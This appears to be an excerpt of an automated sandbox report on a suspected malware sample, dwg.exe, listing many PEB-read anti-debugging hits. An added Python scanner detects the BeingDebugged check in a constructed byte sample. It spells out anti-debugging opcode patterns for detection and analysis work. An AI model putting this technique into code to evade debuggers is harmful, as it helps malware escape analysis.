      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27A185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26C182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E272990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2D41E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_0056587D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565866 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_005658D6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00564AB9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00564F41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444A44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AC450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AC450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444BC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E8CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D14FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04453D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04493540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044C3D40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04437D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441AD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DE539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E8D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0449A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04444D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04444D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04444D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044C8DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04442581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04442581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04442581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04442581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04412D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04412D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04412D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04412D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04412D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E05AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E05AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044435A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04441DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04441DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04441DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04427E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04427E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04427E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04427E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04427E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04427E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04448E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441E620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044CFE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04458EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044436CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044CFEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E8ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044276E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044416E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AFE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044946A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442EF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442FF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E8F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443F716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AFF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AFF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04414F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04414F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444E730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044537F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04428794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04497794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04497794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04497794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04430050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04430050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E1074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D2073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04497016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04497016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04497016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AB8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044140E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044140E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044140E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044158EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04419080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04493884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04493884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044420A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044420A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044420A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044420A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044420A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044420A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044590AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444F0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441C962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04419100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04419100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04419100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04434120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04434120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04434120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04434120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04434120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044A41E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443C182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444A185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04442990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044461A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044461A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeProcess token adjusted: Debug
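
      The `mov eax, dword ptr fs:[00000030h]` hits above are the 32-bit read of the PEB pointer out of the TEB. On its own that read is weak evidence, since the loader, the CRT and any code that walks PEB.Ldr to resolve imports does the same thing; what raises it to an anti-debug check is a follow-up read of the BeingDebugged byte at PEB offset 2. Note also that the dwg.exe addresses (1_2_1E2...) and the rundll32.exe addresses (13_2_044...) in the list differ by a constant 0x19E30000 (compare 1E27002D with 0444002D, or 1E25B02A with 0442B02A), i.e. the same code was found in both processes. The block below is an added example, not part of the Joe Sandbox report: a static byte scan that finds the opcode sequences behind this signature and pairs each with a BeingDebugged read if one follows within a short window. The sample buffer is constructed for the example and is not taken from dwg.exe.

```python
"""Static scan for the x86-32 PEB-read opcode sequences behind the signature
above, and for the PEB.BeingDebugged read that turns them into an anti-debug
check.  Added example, not part of the sandbox report; SAMPLE is a constructed
buffer, not bytes from dwg.exe."""
import re
from typing import Dict, List, Optional

# Opcode sequences as they appear in 32-bit code (0x64 = FS segment override).
PEB_READS: Dict[str, bytes] = {
    "mov eax, dword ptr fs:[30h]": b"\x64\xa1\x30\x00\x00\x00",
    "mov ecx, dword ptr fs:[30h]": b"\x64\x8b\x0d\x30\x00\x00\x00",
    "mov eax, dword ptr fs:[18h] (TEB self)": b"\x64\xa1\x18\x00\x00\x00",
}

# PEB.BeingDebugged is the byte at offset 2 of the 32-bit PEB; these are the
# usual ways of reading it once the PEB pointer sits in eax or ecx.
DEBUG_FOLLOWUPS: Dict[str, bytes] = {
    "movzx eax, byte ptr [eax+2]": b"\x0f\xb6\x40\x02",
    "movzx eax, byte ptr [ecx+2]": b"\x0f\xb6\x41\x02",
    "cmp byte ptr [eax+2], 0": b"\x80\x78\x02\x00",
}


def find_peb_reads(code: bytes, window: int = 16) -> List[dict]:
    """Return every PEB/TEB read in `code`, each paired with the BeingDebugged
    follow-up found within `window` bytes after it (None if there is none)."""
    hits = []
    for name, pattern in PEB_READS.items():
        for m in re.finditer(re.escape(pattern), code):
            tail = code[m.end(): m.end() + window]
            followup: Optional[str] = next(
                (fname for fname, fpat in DEBUG_FOLLOWUPS.items() if fpat in tail), None)
            hits.append({"offset": m.start(), "insn": name, "being_debugged_check": followup})
    return sorted(hits, key=lambda h: h["offset"])


def is_debugger_check(code: bytes) -> bool:
    """True when at least one PEB read is followed by a BeingDebugged read."""
    return any(h["being_debugged_check"] for h in find_peb_reads(code))


# Constructed sample: an inline IsDebuggerPresent-style check followed by a
# benign PEB.Ldr access (the kind of PEB read that does NOT imply anti-debugging).
SAMPLE = (
    b"\x55\x8b\xec"                          # push ebp ; mov ebp, esp
    b"\x64\xa1\x30\x00\x00\x00"              # mov eax, dword ptr fs:[30h]   -> PEB
    b"\x0f\xb6\x40\x02"                      # movzx eax, byte ptr [eax+2]   -> BeingDebugged
    b"\x85\xc0"                              # test eax, eax
    b"\x75\x05"                              # jnz short +5
    b"\x90\x90\x90\x90\x90\x90\x90\x90"      # padding
    b"\x64\x8b\x0d\x30\x00\x00\x00"          # mov ecx, dword ptr fs:[30h]   -> PEB
    b"\x8b\x41\x0c"                          # mov eax, dword ptr [ecx+0Ch]  -> PEB.Ldr (benign)
    b"\xc3"                                  # ret
)


if __name__ == "__main__":
    for h in find_peb_reads(SAMPLE):
        print(f"+{h['offset']:#06x} {h['insn']:<40} {h['being_debugged_check'] or '-'}")
```

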